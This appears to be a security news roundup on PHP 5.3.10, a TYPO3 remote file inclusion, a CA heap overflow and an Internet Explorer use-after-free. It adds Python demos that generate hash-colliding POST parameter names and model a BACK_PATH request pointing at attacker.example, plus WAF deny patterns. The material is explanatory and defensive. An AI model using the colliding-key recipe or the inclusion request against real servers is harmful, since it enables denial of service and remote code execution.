October 22, 2016

PHP 5.3.10 Fixes Critical Security Vulnerability

(LiveHacking.Com) – The PHP development team has released PHP 5.3.10 to fix a recently discovered remote code execution vulnerability. The flaw was introduced by the fix for the hash table collision CPU-usage denial of service that shipped in 5.3.9. That fix capped the number of input variables a request may register at 1000 (the max_input_vars setting), but because of a bug in its implementation a remote attacker could send specially crafted POST requests carrying more variables than the limit, which could crash PHP or allow arbitrary code execution.

PHP 5.3.9 was released just over two weeks ago with over 90 bug fixes, some of them security related. Among them was a fix for the hash table collision problem that affected all the popular Web programming languages (including PHP, ASP.NET, Ruby and Python). At the end of last year, Alexander Klink and Julian Wälde showed that these languages parse POST forms into hash tables so that application developers can access the parameters by name, and that the string hash functions in use are predictable enough for an attacker to choose parameter names that all land in the same bucket. Inserting n such parameters then costs O(n**2) instead of O(n), because every insert has to walk the whole chain of previous entries, making it possible to exhaust hours of CPU time with a single HTTP request. An attacker therefore needs only a small number of specially crafted posts to drive the server's CPU to 100% and create a denial of service condition. PHP 5.3.10, in other words, fixes the fix.
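The following is an added example written for this article, not PHP's own code. It implements DJBX33A (the string hash PHP 5 uses for its symbol tables), builds a set of parameter names that all collide under it using Klink and Wälde's equivalent-substrings construction, and counts the key comparisons a chained hash table performs when those names are registered from a constructed POST body, with and without a max_input_vars-style cap. The table, the request body and the key counts are constructed for the demonstration; the cap models the 5.3.9 limit, not PHP's actual parser.

```python
"""Hash-collision denial of service against a chained hash table keyed with
DJBX33A, plus the effect of a max_input_vars-style cap on how many request
variables get registered. Added example for this article; not PHP's own code."""

from itertools import product

MASK32 = 0xFFFFFFFF


def djbx33a(key: str) -> int:
    """DJBX33A: h = h * 33 + c, starting from 5381. PHP keeps the full
    unsigned long; truncating to 32 bits here does not change the collisions."""
    h = 5381
    for ch in key:
        h = (h * 33 + ord(ch)) & MASK32
    return h


def colliding_keys(n_blocks: int) -> list:
    """2**n_blocks distinct keys that all share one DJBX33A value.

    "Ez" and "FY" have the same length and hash identically
    (33*69 + 122 == 33*70 + 89). For a multiplicative hash each block's
    contribution depends only on its own hash, its length and its position,
    so every concatenation of n such blocks hashes identically as well."""
    return ["".join(blocks) for blocks in product(("Ez", "FY"), repeat=n_blocks)]


class ChainedTable:
    """Minimal separate-chaining hash table that counts key comparisons, the
    quantity that explodes when every key lands in the same bucket."""

    def __init__(self, nbuckets: int = 64):
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key: str, value: str) -> None:
        chain = self.buckets[djbx33a(key) % len(self.buckets)]
        for i, (existing, _) in enumerate(chain):
            self.comparisons += 1          # one compare per entry already in the chain
            if existing == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))


def register_post_vars(body: str, max_input_vars=None) -> ChainedTable:
    """Register an application/x-www-form-urlencoded body into a table.

    max_input_vars models the cap PHP 5.3.9 introduced (default 1000): once
    it is reached the remaining variables are not registered at all, so the
    attacker's chain length, and with it the quadratic cost, is bounded."""
    table = ChainedTable()
    for count, pair in enumerate(body.split("&")):
        if max_input_vars is not None and count >= max_input_vars:
            break
        name, _, value = pair.partition("=")
        table.insert(name, value)
    return table


def post_body(keys) -> str:
    """Constructed request body: every key set to the value 1."""
    return "&".join(f"{k}=1" for k in keys)


def comparisons_for(keys, max_input_vars=None) -> int:
    """Key comparisons spent registering the given parameter names."""
    return register_post_vars(post_body(keys), max_input_vars).comparisons


if __name__ == "__main__":
    hostile = colliding_keys(11)                      # 2048 keys, one bucket
    benign = [f"k{i}" for i in range(len(hostile))]   # same count, spread out
    print("benign                         :", comparisons_for(benign))
    print("colliding                      :", comparisons_for(hostile))
    print("colliding, max_input_vars=1000 :", comparisons_for(hostile, 1000))
```

With 2048 colliding names the table performs 2048*2047/2 comparisons, against a few tens of thousands for the same number of ordinary names; a real attack sends hundreds of thousands of names per request, and the cap at 1000 is what turns that back into a bounded amount of work.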

The new version of PHP can be downloaded here, and all users are recommended to upgrade to it. The various Linux distributions have started to update their repositories.

Critical Vulnerability in TYPO3 Core: Remote Code Execution

(LiveHacking.Com) – The TYPO3 development team has issued a warning about a critical vulnerability in the TYPO3 content management system.

According to the TYPO3 security bulletin, a crafted request to a vulnerable TYPO3 installation allows an attacker to load PHP code from an external source and execute it on the TYPO3 installation. The issue is insufficient validation of the BACK_PATH parameter used by AbstractController.php: with register_globals enabled the request can supply BACK_PATH, and with URL includes enabled the include path it is concatenated into is fetched from a remote host and executed, giving remote code execution.

With reference to the TYPO3 security advisory, a vulnerable system meets all of the following conditions:

  1. TYPO3 version 4.5.0 up to 4.5.8, 4.6.0 or 4.6.1 (plus development releases of the 4.7 branch).
  2. The following PHP configuration variables set to "on": register_globals ("off" by default, and advised to be "off" in the TYPO3 Security Guide), allow_url_include ("off" by default) and allow_url_fopen ("on" by default).

The TYPO3 security advisory recommends one of the following solutions:

  1. Update to TYPO3 version 4.5.9 or 4.6.2, which fix the problem described.
  2. Set at least one of the following PHP configuration variables to "off": register_globals, allow_url_include or allow_url_fopen.
  3. Apply the security patch.
  4. Set up a mod_security rule: SecRule ARGS:BACK_PATH “^(https?|ftp)” “deny”.

The mod_security rule is a stopgap rather than a fix: as written it matches only the three schemes it names, and only in lower case unless a t:lowercase transformation is applied to the argument. Options 1 to 3 remove the underlying condition; in particular, setting allow_url_include to "off" also stops include() from loading code through any other URL-style stream wrapper. See the TYPO3 security advisory for more information.
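The following is an added example written for this article, not TYPO3 or PHP code. It models just enough of PHP's register_globals, allow_url_fopen and allow_url_include semantics to show why the advisory lists all three as preconditions and why turning any one of them off closes the hole, and it encodes the advisory's mod_security rule as a regex next to a case-folded variant. The include shape require($BACK_PATH . 'init.php'), the attacker host attacker.example and the request dictionaries are assumptions made for the demonstration.

```python
"""Model of the conditions behind the TYPO3 BACK_PATH remote file inclusion
and of the mod_security stopgap from the advisory. Added example for this
article, not TYPO3 or PHP code. The include shape require($BACK_PATH . 'init.php')
is an assumed stand-in for the real controller code."""

import re
from dataclasses import dataclass, replace

REMOTE_SCHEMES = ("http", "https", "ftp")   # the schemes the advisory's rule names


@dataclass
class PhpIni:
    register_globals: bool
    allow_url_fopen: bool
    allow_url_include: bool


def back_path_from_request(ini: PhpIni, query: dict) -> str:
    """register_globals=On imports ?BACK_PATH=... straight into the script's
    $BACK_PATH; with it Off the script only ever sees its own default."""
    if ini.register_globals and "BACK_PATH" in query:
        return query["BACK_PATH"]
    return ""


def include_fetches_remotely(ini: PhpIni, path: str) -> bool:
    """Would include($path) go to the network? PHP picks the stream wrapper
    from the text before '://' and retries the lookup lower-cased, so HTTP://
    counts. allow_url_fopen enables URL wrappers at all; allow_url_include
    additionally permits them for include/require."""
    if "://" not in path:
        return False                        # plain (or traversing) local path
    scheme = path.split("://", 1)[0].lower()
    if scheme not in REMOTE_SCHEMES:
        return False
    return ini.allow_url_fopen and ini.allow_url_include


def controller_loads_remote_code(ini: PhpIni, query: dict) -> bool:
    """Assumed shape of the vulnerable spot: an include path built from
    $BACK_PATH without checking that it stays inside the installation."""
    back_path = back_path_from_request(ini, query)
    return include_fetches_remotely(ini, back_path + "init.php")


# The advisory's rule, SecRule ARGS:BACK_PATH "^(https?|ftp)" "deny", as a
# regex: a lower-case scheme prefix, nothing else.
ADVISORY_RULE = re.compile(r"^(https?|ftp)")
# The same check case-folded (what t:lowercase would give) and anchored on
# "://", so an upper-case scheme is caught and a local directory whose name
# merely starts with "ftp" is not.
HARDENED_RULE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def waf_blocks(back_path: str, rule=HARDENED_RULE) -> bool:
    """True if the given rule would deny this BACK_PATH value."""
    return rule.search(back_path) is not None


if __name__ == "__main__":
    all_on = PhpIni(register_globals=True, allow_url_fopen=True, allow_url_include=True)
    attack = {"BACK_PATH": "http://attacker.example/"}     # constructed request
    print("all three On, http:// BACK_PATH ->", controller_loads_remote_code(all_on, attack))
    for field in ("register_globals", "allow_url_fopen", "allow_url_include"):
        ini = replace(all_on, **{field: False})
        print(f"{field}=Off ->", controller_loads_remote_code(ini, attack))
    upper = "HTTP://attacker.example/"
    print("advisory rule vs HTTP:// ->", waf_blocks(upper, ADVISORY_RULE))
    print("hardened rule vs HTTP:// ->", waf_blocks(upper))
```

The model makes the point the advisory's condition list leaves implicit: each of the three settings is a separate gate on the same include, so any one of them being off is sufficient, and a WAF rule that inspects only the literal lower-case scheme is weaker than any of them.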

Critical Vulnerability in CA Gateway Security 8.1 and CA Total Defense r12

(LiveHacking.Com) — CA Technologies is warning its customers of a critical vulnerability in its Gateway Security 8.1 and CA Total Defense r12 products. The vulnerability can allow a remote attacker to execute arbitrary code.

According to the CA portal, the vulnerability, CVE-2011-2667, is caused by insufficient bounds checking and results in a memory overwrite on the heap. By sending a malformed request, an attacker can overwrite a sensitive portion of heap memory, which can potentially result in server compromise.

The heap is the region of a process's memory from which it allocates blocks dynamically at run time (through malloc and similar allocators), as opposed to the stack, which holds fixed-size frames for local variables. Writing past the end of a heap block corrupts whatever lies next to it, which may be another object's data or the allocator's own bookkeeping, and that is what lets a missing bounds check escalate from a crash to code execution.

CA Technologies has released an update to patch the vulnerability. Alternatively, an upgrade to Gateway Security 9.0 is available from the CA support site.

Critical Vulnerability in Internet Explorer

VUPEN, an IT security research company, has reported a critical vulnerability in Internet Explorer that has been known for about two weeks.


With reference to the VUPEN security advisory, a vulnerability has been identified in Microsoft Internet Explorer which could be exploited by remote attackers to take complete control of a vulnerable system. The issue is a use-after-free error in the "mshtml.dll" library when processing a web page that references a CSS (Cascading Style Sheets) file containing various "@import" rules; a freed object is used again, which allows remote attackers to execute arbitrary code via a specially crafted web page.

VUPEN has confirmed this vulnerability with Microsoft Internet Explorer 8 on Windows 7, Windows Vista SP2 and Windows XP SP3, and with Internet Explorer 7 and 6 on Windows XP SP3. Microsoft has yet to respond and it is not known if or when a patch will be released. (Microsoft subsequently acknowledged the issue in Security Advisory 2458511 and fixed it in bulletin MS10-090, covered below.)

A Metasploit Framework exploit module for this vulnerability can be downloaded here.

Security Updates for IE and Stuxnet Holes

Microsoft has released 17 security updates to close 40 security holes.

With reference to the Microsoft Security Bulletin, this security update resolves four privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe of them could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured with fewer user rights on the system are less affected than users who operate with administrative user rights, because the attacker's code runs with the rights of the logged-on user.

The security update is rated Critical for Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8. It addresses the vulnerabilities by modifying the way Internet Explorer handles objects in memory and script during certain processes. It also addresses the vulnerability first described in Microsoft Security Advisory 2458511.

More information is available here.

Source: [Microsoft Security Bulletin MS10-090]